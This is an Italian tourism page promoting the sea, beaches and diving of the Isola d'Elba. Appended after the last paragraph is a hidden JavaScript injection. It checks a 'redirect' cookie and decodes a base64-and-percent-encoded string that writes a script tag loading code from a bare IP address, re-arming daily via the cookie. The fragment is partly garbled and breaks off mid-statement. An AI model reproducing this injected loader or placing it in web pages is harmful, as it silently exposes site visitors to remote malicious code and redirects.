Lo splendido mare dell’Isola d’Elba: protagonista assoluto delle tue vacanze
Se sei amante del bel mare, Elba è il luogo ideale per scegliere la tua vacanza. Spiagge rocciose, ghiaiose o sabbiose, bianche o ferrose per goderti all’Isola d’Elba un mare pulito e cristallino con sfumature smeraldo e turchesi in alcune delle calette più suggestive. Chilometri e chilometri di coste a tua disposizione per goderti il mare dell’Isola d’Elba in tutte le sue sfaccettature: che tu voglia una vacanza tranquilla e rilassante in famiglia o viverti la movida elbana, che sia un soggiorno all’insegna dello sport o della natura, le tue vacanze al mare all’Elba sapranno soddisfare le richieste più diverse.
Il mare dell’Elba offre temperature miti tutto l’anno, ideali per chi fa immersioni, il mare dell’Isola d’Elba ha fondali ricchi di flora e di fauna, le offerte del mare dell’Elba accontentano grandi e piccini con discese lievi o grotte e insenature rocciose. Pensa alla Baia di Cavoli o alla spiaggia di Fetovaia, Marina di Campo o Capo Cavo: ogni costa offre un paesaggio a sé che ti incanterà con un mare così bello che solo l’Isola d’Elba può dare.
Che tu voglia godertela via terra e fruire dei lidi turistici attrezzati con tutti i comfort ed i divertimenti che vuoi, o che la tua vacanza parta dall’acqua alla ricerca di luoghi inesplorati, cale solitarie e spirito libero, sole e mare all’Elba non ti deluderanno mai grazie al loro clima invidiabile ed alle temperature ideali. All’Isola d’Elba il mare più bello della costa toscana è a pochissimi chilometri dalla penisola, è ben collegato ed organizzato con ogni tipologia di struttura ricettiva adatta al tuo stile di vacanza.
La ricchezza di questo territorio però offre inoltre una natura a tratti incontaminata, il verde rigoglioso della macchia mediterranea, degli olivi e dei frutteti, numerosi borghi antichi e bellezze artistiche che incorniceranno ancor meglio la meraviglia di queste acque. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘